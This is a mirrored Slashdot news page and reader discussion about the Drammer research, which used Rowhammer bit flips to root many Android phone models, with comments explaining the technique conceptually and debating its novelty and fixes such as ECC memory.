Slashdot Mirror

← Back to Stories (view on slashdot.org)

Rowhammer Attack Can Now Root Android Devices (softpedia.com)

Posted by BeauHD on from the all-inclusion-attacks dept.

An anonymous reader writes from a report via Softpedia: Researchers have discovered a method to use the Rowhammer RAM attack for rooting Android devices. For their research paper, called Drammer: Deterministic Rowhammer Attacks on Mobile Platforms, researchers tested and found multiple smartphone models to be vulnerable to their attack. The list includes LG Nexus (4, 5, 5X), LG G4, Motorola Moto G (2013 and 2014), One Plus One, HTC Desire 510, Lenovo K3 Note, Xiaomi Mi 4i, and Samsung Galaxy (S4, S5, and S6) devices. Researchers estimate that millions of Android users might be vulnerable. The research team says the Drammer attack has far more wide-reaching implications than just Android, being able to exploit any device running on ARM chips. In the past, researchers have tested the Rowhammer attack against DDR3 and DDR4 memory cards, weaponized it via JavaScript, took over PCs via Microsoft Edge, and hijacked Linux virtual machines. There's an app to test if your phone is vulnerable to this attack. "Rowhammer is an unintended side effect in dynamic random-access memory (DRAM) that causes memory cells to leak their charges and interact electrically between themselves, possibly altering the contents of nearby memory rows that were not addressed in the original memory access," according to Wikipedia. "This circumvention of the isolation between DRAM memory cells results from the high cell density in modern DRAM, and can be triggered by specially crafted memory access patterns that rapidly activate the same memory rows numerous times."

14 of 100 comments (clear)

  1. I don't understand by TheRaven64 · · Score: 5, Interesting

    One of the simplest existing known attacks involves creating an 8MB TypedArray object in JavaScript. This gives you a contiguous virtual address range, which allows you to generate 9 addresses that will be aliased to the same cache line and therefore where 9 sequential writes will trigger an eviction and a write back to RAM. What made this attack now work on mobile devices?

    --
    I am TheRaven on Soylent News
    1. Re:I don't understand by Gravis+Zero · · Score: 4, Informative

      One of the simplest existing known attacks involves [...]. What made this attack now work on mobile devices?

      Surprise, they didn't do it that way!

      It was previously "speculated that Rowhammer on ARM could be impossible, one of the main reasons being that the ARM memory controller might be too slow to trigger the Rowhammer bug" which is true in most cases like the one you listed. However, one thing they figured out is that they could use "DMA buffers bypass the CPU and its caches" using Android's DMA Buffer Management API.

      They did several other things like figure out how to determine the size of the DRAM rows (not uniform on ARM) and create a deterministic way force security-sensitive data int vulnerable rows in a deterministic fashion.

      You can read the paper that describes it here: https://vvdveen.com/publications/drammer.pdf

      TL;DR: They are smart and if your Android phone isn't getting the latest patches then you are vulnerable to total pwn4g3 from anything in the Google Play Store until Google figures out how to scan for apps that will perform this attack.

      --
      Anons need not reply. Questions end with a question mark.
    2. Re:I don't understand by frovingslosh · · Score: 2

      What I don't understand is if this attack is able to root so many different Android systems, why is it still so hard for the device's owner who wants to root his device to actually root it?

      --
      I'm an American. I love this country and the freedoms that we used to have.
  2. Oh dear, more military terminology by Viol8 · · Score: 2, Insightful

    A bunch of pasty faced sad sack nerds sitting in a basement want to sound cool and tough, like they've just done a tour in 'Nam. So they don't say "enabled" by javascript, no no no, its "weaponised" with "attack vectors" instead of flaws or holes. Its just so lame and wannabe.

    1. Re:Oh dear, more military terminology by 110010001000 · · Score: 2

      Also the term "researchers" is dubious. What a waste of time this junk is.

    2. Re: Oh dear, more military terminology by DNS-and-BIND · · Score: 2

      We don't say "'Nam" any more, Grandpa. Moreover it's the marketroids that come up with these names, not the techies. And seriously, nerd-shaming, on Slashdot? Turn in your geek card, it's revoked by unanimous popular consent.

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
  3. Phew, my Galaxy Note 7 is safe! by Anonymous Coward · · Score: 3, Funny

    Lucky I upgra

    1. Re:Phew, my Galaxy Note 7 is safe! by mlw4428 · · Score: 2

      He's just joking. Not every Galaxy Note 7 is having these issues, in fact I just plugged mine in and as you can see it hasn't exp

  4. Re:Bug of feature? by peragrin · · Score: 5, Funny

    don't worry they are working on a java script version.

    That way they can root your device on the web and load the advertising directly to all of your contacts.

    oh wait that's called facebook.

    --
    i thought once I was found, but it was only a dream.
  5. Re:Bug of feature? by TheRaven64 · · Score: 5, Informative

    Rowhammer has been usable from JavaScript for ages. As I said above (in the post currently at 0 overrated), one of the published ways of exploiting it is to use TypedArray objects to get a large chunk of contiguous memory, which then gives you a load of addresses in the same cache associativity set. You then hammer those addresses, which forces repeated cache evictions and eventually flips some adjacent bits. You can then use this to escape from the JavaScript sandbox. I don't know why this attack wouldn't work on mobile devices, so I don't really see what's new here.

    --
    I am TheRaven on Soylent News
  6. hardware fix by sxpert · · Score: 2

    time to implement ECC everywhere, period !
    it's not like ram is expensive anymore

  7. Re:Bugger! by TheCarp · · Score: 2

    While you are correct, I must confess.... MY first reaction to this was "Oh good, you mean I can root my phone that I bought with my money now"

    As much as I hate the implications of this.... and I do.... I also hate that I own a device that is functionally crippled and unable to run many of the apps I would like to run.

    Funny ecosystem we have eh?

    --
    "I opened my eyes, and everything went dark again"
  8. Re:Bug of feature? by TheRaven64 · · Score: 2

    Uh, no. All RowHammer attacks use a hardware vulnerability. That's the definition. The JavaScript attack allows you to exploit this vulnerability from a bug-free JavaScript VM, with the only requirement being that it implements TypedArray objects as contiguous (virtual) memory arrays (which is the obvious way of implementing them, and it would be difficult to implement them usefully any other way if you want to use them with WebGL). The only variation is which bits you choose to try to flip with the RowHammer attack. This is the equivalent of running a different program with a known attack, not a new attack.

    --
    I am TheRaven on Soylent News
  9. Re:Researchers? by Gravis+Zero · · Score: 3, Funny

    Can we stop calling these fucktards researchers already? They are crackers not researchers damn!

    Yeah, I mean, researchers explain their methodology and publish papers about it! These are just the dumbest criminal hackers that put their names on some paper they published! Can't wait until they go to jail for their criminal deeds which they are obviously waiting do in the future! -_-

    --
    Anons need not reply. Questions end with a question mark.